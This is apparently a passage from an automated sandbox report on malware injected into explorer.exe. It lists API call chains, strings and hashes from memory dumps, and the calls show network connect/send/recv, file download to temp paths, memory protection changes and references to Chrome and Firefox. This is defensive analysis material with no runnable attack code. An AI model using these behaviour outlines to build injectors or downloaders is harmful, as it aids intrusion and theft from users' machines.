                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3EDC81
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3EDC94
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC9AC: _getptd.LIBCMT ref: 0F3DC9B5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
                                                                                                                                                                                                                                  • Instruction ID: 9f5a07983b59e8e131633c4dab556da699f5ea3d3a2cfbab22ed5f70b4c091c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f1442a8f3dbd5b539e147b05496275052174a8a2ceb42993bf1ba50d69fb81b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF03C7768069189CB20AF31D8806AC33A4EB55BA9F485021EE0D8B786DF74E586D341
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 0C36B1B2
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0C36B1BE
                                                                                                                                                                                                                                    • Part of subcall function 0C36C324: _NMSG_WRITE.LIBCMT ref: 0C36C35E
                                                                                                                                                                                                                                    • Part of subcall function 0C36C324: _callnewh.LIBCMT ref: 0C36C392
                                                                                                                                                                                                                                    • Part of subcall function 0C36C324: _errno.LIBCMT ref: 0C36C39D
                                                                                                                                                                                                                                    • Part of subcall function 0C36C324: _errno.LIBCMT ref: 0C36C3A8
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C36B207
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                                  • String ID: HeapSize
                                                                                                                                                                                                                                  • API String ID: 431260796-169348363
                                                                                                                                                                                                                                  • Opcode ID: c4eded4a2cbbcf220981e3be27f6b741052388417c2c680b0f1c9c59d7a4c372
                                                                                                                                                                                                                                  • Instruction ID: d065b327974b3a404b6fb477fe8dee8ac5b3e38153f45661f21fa53a2c993faf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4eded4a2cbbcf220981e3be27f6b741052388417c2c680b0f1c9c59d7a4c372
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F05E62331B4A92EE249B50B4407999364FB85388F4895219A8E4BF28EE7CE25DCF01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _callnewh.LIBCMT ref: 0F3DBDB2
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0F3DBDBE
                                                                                                                                                                                                                                    • Part of subcall function 0F3DCF24: _FF_MSGBANNER.LIBCMT ref: 0F3DCF54
                                                                                                                                                                                                                                    • Part of subcall function 0F3DCF24: _NMSG_WRITE.LIBCMT ref: 0F3DCF5E
                                                                                                                                                                                                                                    • Part of subcall function 0F3DCF24: HeapAlloc.KERNEL32 ref: 0F3DCF79
                                                                                                                                                                                                                                    • Part of subcall function 0F3DCF24: _callnewh.LIBCMT ref: 0F3DCF92
                                                                                                                                                                                                                                    • Part of subcall function 0F3DCF24: _errno.LIBCMT ref: 0F3DCF9D
                                                                                                                                                                                                                                    • Part of subcall function 0F3DCF24: _errno.LIBCMT ref: 0F3DCFA8
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3DBE07
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC474: RtlPcToFileHeader.KERNEL32 ref: 0F3DC503
                                                                                                                                                                                                                                    • Part of subcall function 0F3DC474: RaiseException.KERNEL32 ref: 0F3DC542
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                                  • Opcode ID: 00dfcfc9c25bae0ac706d58d4140b2f4968f72e33d59bd5dbb3d11c9ed23155b
                                                                                                                                                                                                                                  • Instruction ID: 8bdf97c984387908fbbe42685868ab3a29a6c07b01d5129e95051161abba4e08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00dfcfc9c25bae0ac706d58d4140b2f4968f72e33d59bd5dbb3d11c9ed23155b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F05E62A01B4B91DE34AB51B4403A5A364E7953A4F841531AA8E4BF66EF3CE289CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 08CBBEEF
                                                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 08CBBEFA
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBBF0A
                                                                                                                                                                                                                                    • Part of subcall function 08CBBF44: HeapCreate.KERNEL32 ref: 08CBBF61
                                                                                                                                                                                                                                    • Part of subcall function 08CBBF44: GetModuleHandleW.KERNEL32 ref: 08CBBF7D
                                                                                                                                                                                                                                    • Part of subcall function 08CBBF44: GetProcAddress.KERNEL32 ref: 08CBBF92
                                                                                                                                                                                                                                    • Part of subcall function 08CBBF44: GetModuleHandleW.KERNEL32 ref: 08CBBFAC
                                                                                                                                                                                                                                    • Part of subcall function 08CBBF44: GetProcAddress.KERNEL32 ref: 08CBBFC1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Module$AddressFileHandleNameProc$CreateFindHeapPathlstrcmpi
                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                  • API String ID: 906591878-3187896405
                                                                                                                                                                                                                                  • Opcode ID: d38017639a78c50223703cd48cbe2de7434eec92683d371d93e8d63aa0aa8543
                                                                                                                                                                                                                                  • Instruction ID: a503d42ae5ba3bfe4d1a9b75c40b505b182fb7f86fabf19cbbb4745d588c97eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d38017639a78c50223703cd48cbe2de7434eec92683d371d93e8d63aa0aa8543
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF06D24B18E8282FB34EB61E855B996370BB88759F80812596CF42664EF7CC34ACB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3C5BF0: HeapCreate.KERNEL32 ref: 0F3C5C0D
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAE60: lstrcpy.KERNEL32 ref: 0F3DAEA0
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0F3D7F51
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0F3D7F5E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                                  • String ID: Chrome$Firefox
                                                                                                                                                                                                                                  • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                                  • Opcode ID: 42660b885f862db325dc9c344f82a0105f74950fec2dd825d99bffef76b8c342
                                                                                                                                                                                                                                  • Instruction ID: a4f8474a90790cd839a675bfda12eeeb080d58ea736d7a6cf234c259d5b01d4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42660b885f862db325dc9c344f82a0105f74950fec2dd825d99bffef76b8c342
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE09264921B0795FA64BB10FC8436633A9B758725F81053AC91E06A32EF3C826DE300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1632192098-0
                                                                                                                                                                                                                                  • Opcode ID: d922dc6d5474ad0d7677fb4ea62b6d4376047efc0216317633cf8026a9a37112
                                                                                                                                                                                                                                  • Instruction ID: fb032577d41ab989a28a160c3ad2fdbc44c76b7e2775589b5f5c12a888091505
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d922dc6d5474ad0d7677fb4ea62b6d4376047efc0216317633cf8026a9a37112
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C513817B0478086DB21BB29D8103AB7B50F785BB4FD98629DF4A07793DA7CD844E780
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___lc_locale_name_func.LIBCMT ref: 0C36AB7C
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF50: _getptd.LIBCMT ref: 0C36CF54
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF50: __updatetlocinfo.LIBCMT ref: 0C36CF77
                                                                                                                                                                                                                                  • ___lc_collate_cp_func.LIBCMT ref: 0C36AB85
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF18: _getptd.LIBCMT ref: 0C36CF1C
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF18: __updatetlocinfo.LIBCMT ref: 0C36CF3F
                                                                                                                                                                                                                                  • __crtLCMapStringA.LIBCMT ref: 0C36ABE2
                                                                                                                                                                                                                                    • Part of subcall function 0C36DCAC: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C36DCCC
                                                                                                                                                                                                                                    • Part of subcall function 0C36DCAC: __crtLCMapStringA_stat.LIBCMT ref: 0C36DD18
                                                                                                                                                                                                                                  • __crtLCMapStringA.LIBCMT ref: 0C36AC1A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String__crt$Locale__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 979804331-0
                                                                                                                                                                                                                                  • Opcode ID: d30e6f89f2d461f1f5cdfa3d35a9307a5348bc4dd50a3e2d821cd10aaf73d924
                                                                                                                                                                                                                                  • Instruction ID: 5d8ef119433c36a63b047ce700c3419b9f9bf863de25dc72b40249be2945ea8b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d30e6f89f2d461f1f5cdfa3d35a9307a5348bc4dd50a3e2d821cd10aaf73d924
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F321B8723247848AD720AF22E44475ABBA5F344FE8F198625EF5967F4CCB78C4419F44
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___lc_locale_name_func.LIBCMT ref: 0F3DB77C
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB50: _getptd.LIBCMT ref: 0F3DDB54
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB50: __updatetlocinfo.LIBCMT ref: 0F3DDB77
                                                                                                                                                                                                                                  • ___lc_collate_cp_func.LIBCMT ref: 0F3DB785
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB18: _getptd.LIBCMT ref: 0F3DDB1C
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB18: __updatetlocinfo.LIBCMT ref: 0F3DDB3F
                                                                                                                                                                                                                                  • __crtLCMapStringA.LIBCMT ref: 0F3DB7E2
                                                                                                                                                                                                                                    • Part of subcall function 0F3DE8AC: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3DE8CC
                                                                                                                                                                                                                                    • Part of subcall function 0F3DE8AC: __crtLCMapStringA_stat.LIBCMT ref: 0F3DE918
                                                                                                                                                                                                                                  • __crtLCMapStringA.LIBCMT ref: 0F3DB81A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String__crt$Locale__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 979804331-0
                                                                                                                                                                                                                                  • Opcode ID: 2545303a4f5da43f65af91d60b331fc5c8220b279db15caee34b6e4b3dcf86b6
                                                                                                                                                                                                                                  • Instruction ID: c7a21d81f09e5bfa37d392cf60b76a483c1c7c4f45349211d106a7cba9179853
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2545303a4f5da43f65af91d60b331fc5c8220b279db15caee34b6e4b3dcf86b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75219F7361478086DB209F22A44475EBAA4F384FF4F5A4629FE6A1BB5ACB38C4418B44
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4115577372-0
                                                                                                                                                                                                                                  • Opcode ID: 08b5bf7c70693a31564a796b8e0c4b8709cf614fe27f3d5533824de36d98544d
                                                                                                                                                                                                                                  • Instruction ID: a531bb0dc1d630e3c18358b2b304adba4fcf93b08cf66ea5198875f4d457805f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b5bf7c70693a31564a796b8e0c4b8709cf614fe27f3d5533824de36d98544d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1531F2632086C18AD7208F35E9003AD7B60F745F98F4D521ADFD947B8ACB78E861C754
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0F3C6CC3
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32 ref: 0F3C6CD9
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6D60: CreateFileA.KERNEL32 ref: 0F3C6DAB
                                                                                                                                                                                                                                  • StrChrA.SHLWAPI ref: 0F3C6CEB
                                                                                                                                                                                                                                  • strtol.MSVCRT ref: 0F3C6D03
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: lstrlenA.KERNEL32 ref: 0F3C6A7C
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: InternetCrackUrlA.WININET ref: 0F3C6A91
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: PathFindFileNameA.SHLWAPI ref: 0F3C6B08
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: GetTempPathA.KERNEL32 ref: 0F3C6B26
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: GetTempFileNameA.KERNEL32 ref: 0F3C6B3C
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: lstrcatA.KERNEL32 ref: 0F3C6B4C
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: lstrcatA.KERNEL32 ref: 0F3C6B58
                                                                                                                                                                                                                                    • Part of subcall function 0F3C69E4: CreateFileA.KERNEL32 ref: 0F3C6B83
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: SHGetFolderPathA.SHELL32 ref: 0F3C6671
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C6681
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C668F
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: CreateDirectoryA.KERNEL32 ref: 0F3C669A
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C66AA
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C66B8
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6638: lstrcatA.KERNEL32 ref: 0F3C66C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$File$CreatePath$NameTemp$CloseCopyCrackDirectoryFindFolderHandleInternetlstrlenstrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 44311351-0
                                                                                                                                                                                                                                  • Opcode ID: 77c53c1dcb3057e23f829fe1a00cdfdb0231b304ccc22d02b2d45c231354240f
                                                                                                                                                                                                                                  • Instruction ID: 436faf784860e6b7646be3d90b562a589f79fcda6a05b4d026259607d8cbe740
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77c53c1dcb3057e23f829fe1a00cdfdb0231b304ccc22d02b2d45c231354240f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9221292230868182EB34EB25F4957BDA761FBC8764F844139C94D47E46DF2DCE49C791
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___lc_locale_name_func.LIBCMT ref: 0C36A8EC
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF50: _getptd.LIBCMT ref: 0C36CF54
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF50: __updatetlocinfo.LIBCMT ref: 0C36CF77
                                                                                                                                                                                                                                  • ___lc_collate_cp_func.LIBCMT ref: 0C36A8F5
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF18: _getptd.LIBCMT ref: 0C36CF1C
                                                                                                                                                                                                                                    • Part of subcall function 0C36CF18: __updatetlocinfo.LIBCMT ref: 0C36CF3F
                                                                                                                                                                                                                                  • __crtCompareStringA.LIBCMT ref: 0C36A950
                                                                                                                                                                                                                                    • Part of subcall function 0C36D7A0: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0C36D7C0
                                                                                                                                                                                                                                    • Part of subcall function 0C36D7A0: __crtCompareStringA_stat.LIBCMT ref: 0C36D801
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0C36A959
                                                                                                                                                                                                                                    • Part of subcall function 0C36CE70: _getptd_noexit.LIBCMT ref: 0C36CE74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CompareLocaleString__crt__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func_errno_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1842237460-0
                                                                                                                                                                                                                                  • Opcode ID: 0c9d195b3829e0dd00895f10f764b3000c2450701e0a1e2e193eb430086f0220
                                                                                                                                                                                                                                  • Instruction ID: ddf9a328461667baf771e50acd7cadf8c83a97fbf1e32a963dafdc5a77aac42b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9d195b3829e0dd00895f10f764b3000c2450701e0a1e2e193eb430086f0220
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B911E732720784869B108F26D48011EBBE4F784FD4B558229EF9A67F5CDB38C4419F40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___lc_locale_name_func.LIBCMT ref: 0F3DB4EC
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB50: _getptd.LIBCMT ref: 0F3DDB54
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB50: __updatetlocinfo.LIBCMT ref: 0F3DDB77
                                                                                                                                                                                                                                  • ___lc_collate_cp_func.LIBCMT ref: 0F3DB4F5
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB18: _getptd.LIBCMT ref: 0F3DDB1C
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDB18: __updatetlocinfo.LIBCMT ref: 0F3DDB3F
                                                                                                                                                                                                                                  • __crtCompareStringA.LIBCMT ref: 0F3DB550
                                                                                                                                                                                                                                    • Part of subcall function 0F3DE3A0: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3DE3C0
                                                                                                                                                                                                                                    • Part of subcall function 0F3DE3A0: __crtCompareStringA_stat.LIBCMT ref: 0F3DE401
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0F3DB559
                                                                                                                                                                                                                                    • Part of subcall function 0F3DDA70: _getptd_noexit.LIBCMT ref: 0F3DDA74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CompareLocaleString__crt__updatetlocinfo_getptd$A_statUpdateUpdate::____lc_collate_cp_func___lc_locale_name_func_errno_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1842237460-0
                                                                                                                                                                                                                                  • Opcode ID: 34423c1fe34a1868ffe0ea850ec384deebba731913f09c9ef5ef6fd5cfb1df5d
                                                                                                                                                                                                                                  • Instruction ID: 92cb45e3b94d4f1e57ee3747974752eca758c35c337f0c542d7b3fc6c9cdfbb6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34423c1fe34a1868ffe0ea850ec384deebba731913f09c9ef5ef6fd5cfb1df5d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F11A27370478486CB10CF26B48011EFBA5F7C4FE0B864229FE894BB6ADB38D4518740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleepioctlsocketrecvsend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1168213214-0
                                                                                                                                                                                                                                  • Opcode ID: f58876c3c849c7fe1e4bf5bd079a8242b1d777b0f55ea3f367d15615d9844685
                                                                                                                                                                                                                                  • Instruction ID: 50f670670aa85470ec7174ed796babc0d9d450e93456beede3d8cd42d52adf80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f58876c3c849c7fe1e4bf5bd079a8242b1d777b0f55ea3f367d15615d9844685
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3611CC2270468182EB309B39F5043AA2392F798BB4F444135DE4947A96DF3CC589CF80
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: WSAStartup.WS2_32 ref: 0F3DAAC7
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: socket.WS2_32 ref: 0F3DAADC
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: gethostbyname.WS2_32 ref: 0F3DAAEE
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: memcpy.MSVCRT ref: 0F3DAB05
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: htons.WS2_32 ref: 0F3DAB13
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: connect.WS2_32 ref: 0F3DAB2A
                                                                                                                                                                                                                                  • send.WS2_32 ref: 0F3DAA37
                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0F3DAA66
                                                                                                                                                                                                                                  • recv.WS2_32 ref: 0F3DAA80
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3DAA8D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@CreateStartupThreadconnectgethostbynamehtonsmemcpyrecvsendsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2800620577-0
                                                                                                                                                                                                                                  • Opcode ID: 202c2c117270ac005d77ff0757f8c36dd695a4c546fe129276d671d5e3a27d32
                                                                                                                                                                                                                                  • Instruction ID: 8424116900b58be85e389a5aaac57c3c937a91cd604c81553814c75c7a2bede4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 202c2c117270ac005d77ff0757f8c36dd695a4c546fe129276d671d5e3a27d32
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A01C03361478183EB249F21F6087AA73A1F785BB5F444731EA5546AA5DF7CC68ACB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 993137029-0
